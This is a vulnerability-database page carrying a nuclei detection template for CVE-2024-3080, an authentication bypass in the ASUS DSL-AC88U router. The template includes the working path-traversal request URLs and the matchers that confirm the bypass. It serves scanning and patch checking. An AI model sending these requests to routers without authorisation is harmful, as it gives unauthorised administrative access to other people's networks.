Lucene search
K

ASUS DSL-AC88U - Authentication Bypass

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 76 Views

Vulnerability in ASUS DSL-AC88U allows authentication bypass via specific URL manipulation.

Related
Refs
Code
id: CVE-2024-3080

info:
  name: ASUS DSL-AC88U - Authentication Bypass
  author: ritikchaddha
  severity: critical
  description: |
    A vulnerability in the ASUS DSL-AC88U router permits unauthorized individuals to bypass authentication.When adding "/js/..%2f%2f" or "/images/..%2f%2e" to the requested URL, it will be recognized as passing the authentication.This vulnerability is part of a broader authentication bypass issue affecting multiple ASUS router models.
  impact: |
    Attackers can bypass authentication and gain unauthorized access to the router's administrative interface.
  remediation: |
    Update ASUS DSL-AC88U firmware to a version that patches the authentication bypass vulnerability.
  reference:
    - https://github.com/Shuanunio/CVE_Requests/blob/main/ASUS/DSL-AC88U/ACL%20bypass%20Vulnerability%20in%20ASUS%20DSL-AC88U.md
    - https://thehackernews.com/2024/06/asus-patches-critical-authentication.html
    - https://nvd.nist.gov/vuln/detail/cve-2024-3080
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-3080
    cwe-id: CWE-287
    epss-score: 0.43456
    epss-percentile: 0.98579
  metadata:
    max-request: 2
  tags: cve,cve2024,asus,router,auth-bypass,lfi,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/js/..%2f%2f/wizard.htm"
      - "{{BaseURL}}/images/..%2f%2f/wizard.htm"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "show_wizardmenu();"

      - type: status
        status:
          - 200
# digest: 490a0046304402207a904e176ba73755737d9aeee95b5e6a3125ebeef9505952a668be12b0928a81022035c0a6046be6b214c4f7fa057851fc0d0d6733f128f7a4889428053a18bb6cfe:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.43456
SSVC
76